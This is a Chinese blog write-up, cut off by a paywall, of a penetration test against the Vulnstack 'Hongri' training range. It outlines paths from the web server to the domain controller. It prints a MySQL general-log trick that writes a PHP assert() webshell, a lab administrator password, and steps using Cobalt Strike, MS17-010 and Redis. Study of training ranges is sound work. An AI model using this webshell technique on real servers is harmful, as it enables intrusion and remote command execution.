红日靶场全流程渗透测试

最新推荐文章于 2024-10-22 19:41:02 发布
最新推荐文章于 2024-10-22 19:41:02 发布
阅读量2.9k 收藏 18
点赞数 1
分类专栏: * 渗透测试记录 文章标签: php web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35349673/article/details/123453836
版权
本文详细记录了一次渗透测试过程,从利用PHP探针和弱口令攻破Web服务器,通过目录扫描找到入口,到内网渗透,抓取密码并利用MS17-010漏洞攻击域控,最后通过Redis未授权获取shell并提权。整个流程展示了多种渗透技术和工具的运用。
摘要由CSDN通过智能技术生成

作者:linshao

靶场下载地址:

http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

目录

web->内网(两条路线:)

 一.php探针->mysql弱口令->目录扫描phpmyadmin->日志写shell

 二.目录扫描yxcms.rar->后台弱口令->模板写shell

内网->域控(三条线路:)

一.密码抓取->寻找域控->psexec登录域控->get

 二.主机发现->漏洞扫描->域控存在ms17-010->msf代理攻击->get

三.主机发现->端口扫描->redis未授权->getshell->正向上线msf->提权->get

一、web->内网

一.php探针->mysql弱口令->目录扫描phpmyadmin->日志写shell

1.mysql弱口令:主页尝试root/root数据库连接正常

2.目录扫描phpmyadmin:目录扫描存在phpmyadmin

3.日志写shell:

    文件导出被禁止

    测试一下确实无法导出

    select "test" into outfile "C:\\www\\phpstudy\\test.php"

    使用日志写shell

  //设置日志文件,web绝对路径可以从探针得知

SET GLOBAL general_log_file = "C:\phpStudy\WWW\1.php";set global general_log='on';      //开启日志SELECT '<?php assert($_REQUEST["cmd"]);?>';

4.访问成功:

二.目录扫描yxcms.rar->后台弱口令->模板写shell

1.目录扫描yxcms.rar:

2.登录后台,新建模板

3.访问shell,模板文件位置可在本地搭建环境得知

内网->域控

先上线cs,powershell上线失败,生成exe上线成功

一.密码抓取->寻找域控->psexec登录域控

密码抓取

Administrator/Admin@123

最低0.47元/天 解锁文章
linshao_
关注
专栏目录
渗透测试流程与内网渗透测试实战
悦分享
07-15 7514
关于免杀,我使用的部是msf的编码自免杀,64位使用的是x64/zutto_dekiru,32位使用的是x86/shikata_ga_nai,360都没有拦截。虽然靶机中有360,但是我直接上传的mimikatz也没有被杀,所以我有些怀疑是360的版本比较低,除了web服务器上传的第一个payload,其它都进行了编码处理,而第一个也确实没有执行成功,这说明360至少对第一个payload是拦截了的。
靶场Writeup(四) | 反序列化、命令执行、Tomcat、域渗透等漏洞组合到攻克域控
Ms08067安全实验室
11-19 337
文章来源|MS08067 安全练兵场 知识星球本文作者:godunt(安全练兵场星球合伙人)玩靶场 认准安全练兵场成立"安全练兵场"的目的目前,安全行业热度逐年增加,很多新手安全从业人员在...
红日靶场
weixin_44339234的博客
07-11 1505
新手学习记录,有误之处多多指点
红日靶场(vulnstack)一 超面详细的渗透测试学习笔记
热门推荐
qq_41821603的博客
11-24 5万+
这里写目录标题一、环境搭建二、拿下web服务器2.1 信息收集 一、环境搭建 实验环境拓扑如下: windows2008 域控 (host-only) windiws 7 web服务器 (双网卡 host-only + NAT) windows 2003 域内PC (host-only) 二、拿下web服务器 2.1 信息收集 ...
红日靶场(三)1、环境介绍及环境搭建
最新发布
zhouA0221的博客
10-22 639
红日靶场03是一个用于安全测试和渗透测试的虚拟化环境,可以帮助用户通过模拟攻击和防御场景来提升网络安全技能。该靶场包含了多个虚拟机和网络配置,用户可以在其中进行各种安全测试活动,如信息收集、漏洞利用、权限提升等。
红日靶场渗透测试——红日靶场1(详细笔记)
qq_52849046的博客
05-24 7769
这篇博客是为小编自己学习记录的同时,分享出来让大神们共同检阅,如有问题,还请各位大神在评论区多多指点。ps:此文章仅学习使用,切勿用于实战,容易被gangan
Vulnstack红日安全内网域渗透靶场1实战
道阻且长,行则将至。
07-14 1万+
文章目录前言靶场搭建外网打点MySQL写日志GetshellCMS后台上传GetShell内网渗透靶机CS后门上线内网域信息的收集 前言 VulnStack 是由红日安全团队倾力打造一个靶场知识平台。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场的渗透过程。 靶场搭建 在线 靶场链接 如下: 1、下载后为 3 个虚拟机,网络拓扑如下: 2、从网络拓扑图得知,需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,故需要配置两个网络适配器(网卡),点击
红日内网渗透靶场1
weixin_47781572的博客
10-10 2266
官方下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
Vulnstack红日安全内网域渗透靶场1实战_vulnstack靶场
2401_84297455的博客
04-28 2908
VulnStack是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及域管理等)部依据国内企业的业务习惯进行模拟,环境设计思路部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场的渗透过程。在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。
Vulnstack红日安全内网域渗透靶场1实战_vulnstack靶场(1)
2401_84297455的博客
04-28 981
VulnStack是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及域管理等)部依据国内企业的业务习惯进行模拟,环境设计思路部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场的渗透过程。
红日内网渗透靶场1(ATK&CK红队评估实战靶场一)
qq_45780190的博客
02-21 1万+
环境搭建: 官方下载地址以及实验文档如下: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 网络拓扑 需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,一个用来向外网提供web服务,一个是通向内网。添加网络设配器如下图。 将 Win7 的网络适配器 1 设置成 VMnet1 仅主机模式(内网),网络适配器 2 设置成 NAT 模式(外网)。 而 Win2003、Win2008 网络适配器设置成VMnet1仅主机模式
渗透测试之——红日靶机(一)
weixin_43072923的博客
04-25 867
红日靶机练习
红日内网渗透靶场5
qq_48039118的博客
03-30 410
我是一名网安小白,此篇文章如有错误,请评论指出!!!
内网域渗透总结(红日靶场一)
未完成的歌~的博客
04-11 7451
使用 smb beacon,由一台已经拿到 beacon 的机器,抓取密码后进行smb喷射,得到另一台开放445端口的机器上的administrator账户密码,在目标机器不出网的情况下,可以使用smb beacon使目标主机上线。发现也存在漏洞,同样先使用 use exploit/windows/smb/ms17_010_eternalblue 模块利用,但还是利用不了,猜测可能是防火墙的问题,因为这个系统是64位的。防火墙已经关掉了,再来试试 ms17_010_eternalblue,然而还是不行。
红日内网渗透靶场2(ATK&CK红队评估实战靶场二)
qq_45780190的博客
03-01 1万+
环境搭建: 官方下载地址以及实验文档如下: http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 跟靶场一中的环境类似需要模拟内网和外网两个网段, PC端虚拟机相当于网关服务器,所以需要两张网卡,一个用来向外网提供web服务,一个是通向内网。 PC配置如下: DC在该环境中充当是域控。DC配置如下 : WEB配置:需要两块网卡,相当于网关服务器。 这里需要将新增的网卡VMnet2,ip调成了10段。 网络配置完成,这三台虚拟主机默认开机密码都是:密码
内网渗透——红日靶场一总结
m0_52403371的博客
07-02 904
内网渗透——红日靶场一总结
内网渗透—红日靶场
一个普普通通的博客
04-23 5419
红日靶场三—红队实战,内网渗透
红日靶场(七)vulnstack7
sagic的博客
04-07 2183
自学网络安全,学习靶场渗透
红日靶场(一)
qq_58091216的博客
05-01 3255
红一1. 实验环境拓扑如下:2. 下载好镜像文件,下载地址:(13G,需要百度网盘会员)3.需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,一个用来向外网提供web服务,一个是通向内网。添加网络设配器如下图将 Win7 的网络适配器 1 设置成 VMnet1 仅主机模式(内网),网络适配器 2 设置成 NAT 模式(外网)而 Win2003、Win2008 网络适配器设置成VMnet1仅主机模式(内网)。网络配置完成,这三台虚拟主机默认开机密码都是。
红日靶场下载csdn
08-13
红日靶场是一个很受欢迎的网络安全实验平台,用于学习和锻炼网络攻防技术。由于该平台所提供的安全实验环境包含了许多常见的漏洞和攻击场景,因此在安全爱好者和专业人士中间都非常受欢迎。 要下载红日靶场,首先...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值